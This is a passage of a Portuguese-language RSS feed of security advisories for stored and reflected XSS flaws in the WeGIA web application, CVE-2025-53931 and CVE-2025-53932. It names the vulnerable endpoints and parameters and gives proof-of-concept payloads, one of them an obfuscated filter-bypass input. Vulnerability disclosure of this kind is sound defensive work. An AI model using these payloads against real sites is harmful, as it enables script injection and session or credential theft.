&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_raca.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;raca&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_raca.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53931-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_racaphp-parâmetro-raca&amp;#34;&amp;gt;CVE-2025-53931: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_raca.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;raca&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53931&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53931&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_raca.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;raca&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_raca.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;raca&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;raca&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53931/image.png&amp;#34;
	width=&amp;#34;1321&amp;#34;
	height=&amp;#34;325&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53931/image_hu_2ea3161f08493fe2.png 480w, /p/cve-2025-53931/image_hu_abc31e9ddb1e0d31.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;406&amp;#34;
		data-flex-basis=&amp;#34;975px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53931/image-1.png&amp;#34;
	width=&amp;#34;1268&amp;#34;
	height=&amp;#34;246&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53931/image-1_hu_a9011363d8bed49b.png 480w, /p/cve-2025-53931/image-1_hu_4cccc1269b2a5680.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;515&amp;#34;
		data-flex-basis=&amp;#34;1237px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9mfp-wfmj-cg3j&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9mfp-wfmj-cg3j&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaboradores&amp;#34;&amp;gt;Colaboradores
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53932</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53932/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53932/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53932-cross-site-scripting-xss-refletido-no-endpoint-cadastro_adotantephp-parâmetro-cpf&amp;#34;&amp;gt;CVE-2025-53932: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;cadastro_adotante.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53932&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53932&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;cadastro_adotante.php&amp;lt;/code&amp;gt; do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;GET /html/pet/adotantes/cadastro_adotante.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53932-cross-site-scripting-xss-refletido-no-endpoint-cadastro_adotantephp-parâmetro-cpf&amp;#34;&amp;gt;CVE-2025-53932: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;cadastro_adotante.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53932&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53932&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;cadastro_adotante.php&amp;lt;/code&amp;gt; do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;GET /html/pet/adotantes/cadastro_adotante.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;amp;lt;iNput///type=&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;password&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;////id=&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;CF&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;bypaSS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;%20name=&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;query&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;////value=&amp;amp;#34;&amp;amp;#34;///oNfocUs=&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;chux&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;%20AutOfoCus=&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53932/image.png&amp;#34;
	width=&amp;#34;1359&amp;#34;
	height=&amp;#34;314&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53932/image_hu_f54c74625795f79f.png 480w, /p/cve-2025-53932/image_hu_1a0f9a99ae4c4208.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;432&amp;#34;
		data-flex-basis=&amp;#34;1038px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-3vfw-749q-qp6r&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-3vfw-749q-qp6r&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaboradores&amp;#34;&amp;gt;Colaboradores
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53933</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53933/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53933/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53933-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_enfermidadephp-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-53933: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_enfermidade.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
